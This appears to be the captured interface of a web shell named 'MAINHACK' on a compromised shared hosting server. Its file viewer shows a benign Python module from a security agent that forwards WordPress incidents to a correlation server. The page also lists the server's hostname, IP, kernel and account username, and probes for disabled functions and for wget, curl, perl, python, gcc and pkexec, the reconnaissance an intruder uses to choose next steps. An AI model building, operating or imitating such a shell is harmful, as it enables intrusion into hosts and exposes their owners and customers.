[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: incident_sender.py
File is not writable. Editing disabled.
"""Send WordPress incidents to the correlation server.""" import json import logging from datetime import datetime from typing import Any from defence360agent.contracts.messages import SensorWordpressIncidentList from defence360agent.contracts.plugins import MessageSink logger = logging.getLogger(__name__) class IncidentSender: """ Send WordPress incidents to the correlation server. WordPress incidents are already in the Incident table (visible to UI). This class sends them to correlation via Reportable messages, which are automatically handled by SendToServer/SendToServerFGW plugins. """ def _prepare_incident_for_correlation( self, incident: dict ) -> dict[str, Any]: """ Prepare an incident for sending to the correlation server. WordPress incidents use extra_info JSON field to store plugin-specific data. Args: incident: WordpressIncident dictionary (with extra_info populated) Returns: Dictionary formatted for correlation server """ logger.info("Preparing incident for correlation: %s", incident) # JSONField automatically deserializes to dict, fallback to empty dict if None extra: dict = incident.get("extra_info") or {} # Convert timestamp to int and format date timestamp_value: float = float(incident.get("timestamp") or 0) timestamp = int(timestamp_value) dt = ( datetime.fromtimestamp(timestamp_value).strftime("%Y-%m-%d") if timestamp_value else "" ) return { "timestamp": timestamp, "dt": dt, "plugin_id": incident.get("plugin"), "rule": incident.get("rule") or "unknown", "name": incident.get("name"), "message": incident.get("description"), "severity": incident.get("severity"), "attackers_ip": incident.get("abuser") or "", "domain": incident.get("domain") or "", "retries": incident.get("retries") or 1, "uri": extra.get("request_uri") or "", "user_agent": extra.get("http_user_agent") or "", "http_method": extra.get("request_method") or "", "user_logged_in": extra.get("user_logged_in") == "true" if extra.get("user_logged_in") else None, "file_path": extra.get("site_path") or "", "user": extra.get("username") or "", "tag": self._build_tags(extra), # Include WordPress-specific fields "target": extra.get("target") or "", "slug": extra.get("slug") or "", "version": extra.get("version") or "", "mode": extra.get("mode") or "", "details": extra, } def _build_tags(self, extra: dict) -> list[str]: tags = ["wordpress", "cve"] if extra.get("cve"): tags.append(extra["cve"]) if extra.get("target"): tags.append(f"target_{extra['target']}") if extra.get("mode"): tags.append(f"mode_{extra['mode']}") return tags async def send_incidents( self, sink: MessageSink | None, incidents: list[dict] ) -> int: """ Send WordPress incidents to the correlation server. Since incidents are already in the WordpressIncident table (visible to UI), we just need to send them to correlation. Args: incidents: List of incidents to send Returns: Number of incidents sent """ if sink is None: logger.warning("No sink provided, skipping incident sending") return 0 if len(incidents) == 0: logger.debug("No incidents to send, skipping") return 0 logger.info( "Sending %d incidents to correlation server", len(incidents) ) correlation_batch = [ self._prepare_incident_for_correlation(incident) for incident in incidents ] await self._send_batch(sink, correlation_batch) return len(correlation_batch) async def _send_batch( self, sink: MessageSink, correlation_batch: list[dict] ): """ Send a batch of incidents to correlation server. Uses SensorIncidentList Reportable message which is automatically sent to correlation via SendToServer/SendToServerFGW plugins. Args: sink: MessageSink to send the batch to correlation_batch: Incidents formatted for correlation server """ logger.info( "Sending batch of %d incidents to correlation server", len(correlation_batch), ) logger.info( "Correlation batch json: %s", json.dumps(correlation_batch, indent=2), ) try: # Send as a Reportable message # The SendToServer/SendToServerFGW plugin will handle actual delivery await sink.process_message( SensorWordpressIncidentList(correlation_batch) ) logger.info( "Queued %d wordpress incident(s) for correlation server", len(correlation_batch), ) except Exception as e: logger.error( "Failed to queue incident batch: %s", e, ) raise
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: premium264.web-hosting.com
Server IP: 69.57.162.13
PHP Version: 8.1.34
Server Software: LiteSpeed
System: Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
HDD Total: 97.87 GB
HDD Free: 73.59 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
No
pkexec:
No
git:
Yes
User Info
Username: kidscntx
User ID (UID): 1154
Group ID (GID): 1112
Script Owner UID: 1154
Current Dir Owner: N/A